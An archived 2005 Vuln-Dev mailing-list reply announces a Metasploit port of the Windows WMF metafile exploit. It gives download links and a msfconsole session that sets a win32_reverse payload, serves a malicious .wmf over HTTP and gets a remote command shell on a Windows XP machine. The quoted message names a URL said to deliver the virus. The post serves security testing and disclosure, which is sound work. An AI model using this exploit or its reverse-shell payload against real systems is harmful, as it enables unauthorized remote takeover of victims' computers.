Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Is this a new exploit?

from [H D Moore] Network Security [Permanent Link]
Subject: Re: Is this a new exploit?
Date: Tue, 27 Dec 2005 21:34:51 -0600 
I ported the exploit to the Metasploit Framework in case anyone wants to 
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1 and SP2.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>  


On Tuesday 27 December 2005 14:20, noemailpls@noemail.ziper wrote:

Warning the following URL successfully exploited a fully patched
windows xp system with a freshly updated norton anti virus.

unionseek.com/d/t1/wmf_exp.htm

The url runs a .wmf and executes the virus, f-secure will pick up the
virus norton will not.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Exploitation of Windows WMF on the web, Daniel Bonekeeper
Next by Date:  [BUGZILLA] Security advisory for Bugzilla < 2.16.11, David Miller
Previous by Thread:  Is this a new exploit?, noemailpls
Next by Thread:  Re: Is this a new exploit?, redxii1234
Indexes:  [Date] [Thread] [Top] [All Lists]